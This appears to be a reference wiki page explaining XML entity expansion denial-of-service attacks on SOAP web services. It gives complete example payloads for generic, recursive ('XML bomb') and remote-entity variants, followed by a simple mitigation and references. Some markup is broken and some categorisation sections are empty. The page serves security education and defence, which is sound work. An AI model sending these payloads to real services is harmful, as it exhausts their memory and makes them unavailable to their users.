XML Entity Expansion
The XML standard allows the use of DTDs (Document Type Definitions). DTDs are meant to define the expected structure of an XML document. One feature of DTDs are the ability to define entities. Entities are variables used to define shortcuts to strings or special characters. Typical examples of predefined entities are the entities used within HTML. In order to use the "<" or ">" character outside of HTML Tags, they have to be replaced by their entities:
- the character ">" has the entity ">"
- the character "<" has the entity "<"
Entities that are not predefined can be declared internal or external.
- internally declared - the entity is defined within the same document.
- externally declared - the entity is defined in an external document. Only the reference to the external document is given.
When included in a SOAP message, entities of DTDs can be used to mount attacks limiting the availability of an web service by draining system resources through the creation of large memory structures.
NOTE: Since SOAP Version 1.2  external entities are not allowed within SOAP messages. However, many web services don't implement the standard correctly, that is why this attack is still viable. See  for more details: "The XML infoset of a SOAP message MUST NOT contain a document type declaration information item."
NOTE: DOM based parser and streaming based parsers are both susceptible to this type of attack, since this vulnerability does not target the parser itself. It aims at the XML validator that is working prior to the parser.
There are three attack subtypes:
- XML Generic Entity Expansion <br\> XML Generic Entity Expansion is the most simple attack. All the attacker has to do is declare an entity with over long content and use the entity many times in the SOAP Message. When parsing the SOAP message all entities are resolved which causes an exhaustion of the RAM of the attacked web service. <br\>As a rough estimate the attack works when using the following parameters: <br\>-Length of string: more than 10^5 characters <br\>-Number of entity occurrences in document: more than 30,000 occurrences. <br\><br\>For more details please refer to the work of Leroy Metin Yaylacioglu listed in the reference section. <br\>This attack is also known as the "Quadritiv Blowup DOS Attack"<br\><br\>
- XML Recursive Entity Expansion <br\>The basic idea behind attack is the same as the XML Generic Entity Expansion attack,however the attack is a little more elegant. When successful a relatively small SOAP Message is expanded to a large memory structure which exhausts the application's RAM. <br\>Lets explain the attack based on an example: <br\>The attacker starts off by defining at least 100 entities named x0 to x100. The entity &x0; gets a fixed value assigned. All other entities &x1; through &x100; contain the entity name of the previous entity twice as a value. If we define the entity x50, then the value of the entity is "&x49;&x50;". Later in the document the &x100; is used exactly once. This is sufficient to devastate the web services availability since the document grows exponentially. With every recursion the number of entities in the document doubles, resulting in 2^101 repetitions of the value of the entity &x0;. <br\>This attack is also known as "XML Bomb"<br\><br\>
- XML Remote Entity Expansion <br\> When using the XML Remote Entity Expansion attack an attacker defines an external entity, that in return also points to an external entity and so on. Before doing any further processing the parser has to retrieve all external entity definitions. Depending on the web service load this can use up all the remaining system resources of the web service and therefore render it unavailable. <br\><br\>
- XML C14N Entity Expansion <br\> The attack works just as described above. The only difference is, that the entities are resolved during the canonicalization process.<br\>br\>
Prerequisites for attack
In order for this attack to work the attacker has to have knowledge about the following things:
- Attacker knows the endpoint of web service. WSDL is not required, since the attack is solely focused on the XML Parser. It doesn't matter if the Operations within the SOAP Message are valid.
- Attacker can reach endpoint from its location. Access to the attacked web service is required. If the web service is only available to users within a certain network of a company, this attack is limited.
Graphical representation of attack
It is important to understand, that DOM based parser and streaming based parser are susceptible to this attack alike, since this attack doesn't target the parser itself. This attack focuses onthe XML validator that is doing its work prior to the parser.
- Red box = attacked web service component
- Black box = attacker location
- blue box = other web service components not actively used in the attack
We will give an example for each attack subtype:
Example 1: XML Generic Entity Expansion
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE s [ <!ENTITY x "OVERLONG_CONTENT_HERE_WITH_MORE_THAN_10^5_CHARACTERS"> ]> <soapenv:Envelope xmlns:ns1="http://myPackageNamespace"xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> </soapenv:Header> <soapenv:Body> <ns1:reverse> <s> &x; &x; ... <!-- For an successful attack it is recommend to repeat the entity for more than 30,000 times --> </s> </ns1:reverse> </soapenv:Body> </soapenv:Envelope>
Listing 1: XML Generic Entity Expansion
Example 2: XML Recursive Entity Expansion
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE s[ <!ENTITY x0 "ha!"> <!ENTITY x1 "&x0;&x0;"> <!ENTITY x2 "&x1;&x1;"> <!ENTITY x3 "&x2;&x2;)"> <!-- Entities from x4 to x98... --> <!ENTITY x99 "&x98;&x98;"> <!ENTITY x100 "&x99;&x99;"> ]> <soapenv:Envelope xmlns:soapenv="..." xmlns:ns1="..."> <soapenv:Header> </soapenv:Header> <soapenv:Body> <ns1:reverse> <s>&x100;</s> </ns1:reverse> </soapenv:Body> </soapenv:Envelope>
Listing 2:XML Recursive Entity Expansion
Example: XML Remote Entity Expansion
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE s [ <!ENTITY attack SYSTEM "http://www.ws-attacks.org/malicious_entities.dtd"> <!-- http://www.ws-attacks.org/malicious_entities.dtd points to a dtd that in return also contains external entity definitions --> ]> <soapenv:Envelope xmlns:ns1="http://myPackageNamespace"xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> </soapenv:Header> <soapenv:Body> <ns1:reverse> <s>&attack;</s> </ns1:reverse> </soapenv:Body> </soapenv:Envelope>
Listing 3:XML Remote Entity Expansion
Attack mitigation / countermeasures
If you are sure that your web service framework implements the SOAP 1.2 standard correctly you are not vulnerable to any of these attacks. In case you are not sure, the easiest and most forward way is to manually check prior to parsing whether or not an opening DTD Tag is existent. If that is the case just discard the message.
Categorisation by violated security objective
The attack aims at exhausting the system resources, therefore it violates the security objective Availability.
Categorisation by number of involved parties
Categorisation by attacked component in web service architecture
The first four attack subtypes are categorised as follows:
The last attack subtype - XML C14N Entity Expansion - is categorised as follows:
Categorisation by attack spreading
- Brad Hill. A taxonomy of attacks against xml digital signatures & encryption.
- Nishchal Bhalla and Sahba Kazerooni.Web services vulnerabilities.http://www.blackhat.com/presentations/bh-europe-07/Bhalla-Kazerooni/Whitepaper/bh-eu-07-bhalla-WP.pdf, February 2007. Accessed 01 July 2010.
- Leroy Metin Yaylacioglu. Business value einer web service firewall. Master’s thesis,Hochschule für Angewandte Wissenschaften Hamburg, 2008.